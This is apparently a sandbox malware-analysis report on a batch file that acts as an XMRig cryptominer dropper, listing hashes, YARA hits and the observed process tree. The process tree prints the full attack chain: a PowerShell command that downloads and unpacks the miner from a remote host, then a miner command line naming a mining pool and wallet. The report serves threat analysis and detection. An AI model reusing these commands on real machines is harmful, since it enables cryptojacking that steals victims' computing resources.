Overview
overview
10Static
static
1tesy - Copy (10).bat
windows10-1703-x64
10tesy - Copy (11).bat
windows10-1703-x64
10tesy - Copy (12).bat
windows10-1703-x64
10tesy - Copy (13).bat
windows10-1703-x64
10tesy - Copy (14).bat
windows10-1703-x64
10tesy - Copy (2).bat
windows10-1703-x64
10tesy - Copy (3).bat
windows10-1703-x64
10tesy - Copy (4).bat
windows10-1703-x64
10tesy - Copy (5).bat
windows10-1703-x64
10tesy - Copy (6).bat
windows10-1703-x64
10tesy - Copy (7).bat
windows10-1703-x64
10tesy - Copy (8).bat
windows10-1703-x64
10tesy - Copy (9).bat
windows10-1703-x64
10tesy - Copy.bat
windows10-1703-x64
10tesy.bat
windows10-1703-x64
10Analysis
-
max time kernel
1795s -
max time network
1795s -
platform
windows10-1703_x64 -
resource
win10-20231220-en -
resource tags
arch:x64arch:x86image:win10-20231220-enlocale:en-usos:windows10-1703-x64system -
submitted
23-12-2023 23:02
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
tesy - Copy (11).bat
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
tesy - Copy (12).bat
Resource
win10-20231215-en
Behavioral task
behavioral4
Sample
tesy - Copy (13).bat
Resource
win10-20231215-en
Behavioral task
behavioral5
Sample
tesy - Copy (14).bat
Resource
win10-20231215-en
Behavioral task
behavioral6
Sample
tesy - Copy (2).bat
Resource
win10-20231215-en
Behavioral task
behavioral7
Sample
tesy - Copy (3).bat
Resource
win10-20231215-en
Behavioral task
behavioral8
Sample
tesy - Copy (4).bat
Resource
win10-20231220-en
Behavioral task
behavioral9
Sample
tesy - Copy (5).bat
Resource
win10-20231215-en
Behavioral task
behavioral10
Sample
tesy - Copy (6).bat
Resource
win10-20231215-en
Behavioral task
behavioral11
Sample
tesy - Copy (7).bat
Resource
win10-20231215-en
Behavioral task
behavioral12
Sample
tesy - Copy (8).bat
Resource
win10-20231215-en
Behavioral task
behavioral13
Sample
tesy - Copy (9).bat
Resource
win10-20231220-en
Behavioral task
behavioral14
Sample
tesy - Copy.bat
Resource
win10-20231215-en
General
-
Target
tesy - Copy (4).bat
-
Size
608B
-
MD5
727c8da0478af118c957ae60f7161cab
-
SHA1
cf18105b8659e93bbd2824fa35ef1bae7b395301
-
SHA256
97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
-
SHA512
d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01
Malware Config
Extracted
https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
Signatures
-
XMRig Miner payload 64 IoCs
resource yara_rule behavioral8/files/0x000600000001abb2-115.dat family_xmrig behavioral8/files/0x000600000001abb2-115.dat xmrig behavioral8/memory/3196-118-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-121-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-122-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-123-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-126-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-127-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-128-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-129-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-130-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-131-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-132-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-133-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-134-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-135-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-136-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-137-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-138-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-139-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-140-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-141-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-142-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-143-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-144-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-145-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-146-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-147-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-148-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-149-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-150-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-151-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-152-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-153-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-154-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-155-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-156-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-157-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-158-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-159-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-160-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-161-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-162-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-163-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-164-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-165-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-166-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-167-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-168-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-169-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-170-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-171-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-172-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-173-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-174-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-175-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-176-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-177-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-178-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-179-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-180-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-181-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-182-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig behavioral8/memory/3196-183-0x00007FF6DB910000-0x00007FF6DC413000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
flow pid Process 2 2452 powershell.exe 4 2452 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3196 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2452 powershell.exe 2452 powershell.exe 2452 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeLockMemoryPrivilege 3196 xmrig.exe Token: SeLockMemoryPrivilege 3196 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3196 xmrig.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 312 wrote to memory of 2452 312 cmd.exe 24 PID 312 wrote to memory of 2452 312 cmd.exe 24 PID 312 wrote to memory of 1952 312 cmd.exe 76 PID 312 wrote to memory of 1952 312 cmd.exe 76 PID 312 wrote to memory of 3196 312 cmd.exe 77 PID 312 wrote to memory of 3196 312 cmd.exe 77
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (4).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exexmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b142⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3196
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD542d4b1d78e6e092af15c7aef34e5cf45
SHA16cf9d0e674430680f67260194d3185667a2bb77b
SHA256c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0
SHA512d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930
-
Filesize
1KB
MD5f645bc2e6c6615113e527f8fa0132221
SHA15a11e598ce54ebc23c895211c85467d2a4925ed0
SHA2568a45ab461706e2a48d7788182e7f412d1b9cec69317cdd1e410281d6787f1ada
SHA512fe85c263f7597f6afbdeb78fccb866b32b45a8d25cbe32ade8956fe9e1b63694aec097e8993fc3d1715a46bc343187b30eeefe5656d10c11a7ea23292f744403
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
349KB
MD50e16c546b873e7b4ddca042283be2b34
SHA1aa91595d7cd551e9e6dadb85583527641d4c5127
SHA256a2582d262feee3aefd6c27239a3c4baf0df14bfad1338ba5df9e3b0ed4cbd418
SHA512ca857047baecbec2180a69f397b899ba9ae23b71de8c88744fcb4917f9e4bde5be68bdb080bf4adcec52a0143936afc281a4e7ed6554a23cda392785f585f5b4
-
Filesize
243KB
MD5bfc3a14097f9979746059c1722f00ea9
SHA157052cda15f91f59263f137bde60d059cc073c05
SHA25683773164905b66fe3a9ada02a4fd611f1a017a2cead336bb7ef0e725995b7b5c
SHA512116cbda39a491e298bcb2a002a3aaaaeca02f7993059f592b72a6d132e8fa6bcf7fb2c9cce1283de42cc629cab120e1085cb8f1b014d064c190161b4dceb644d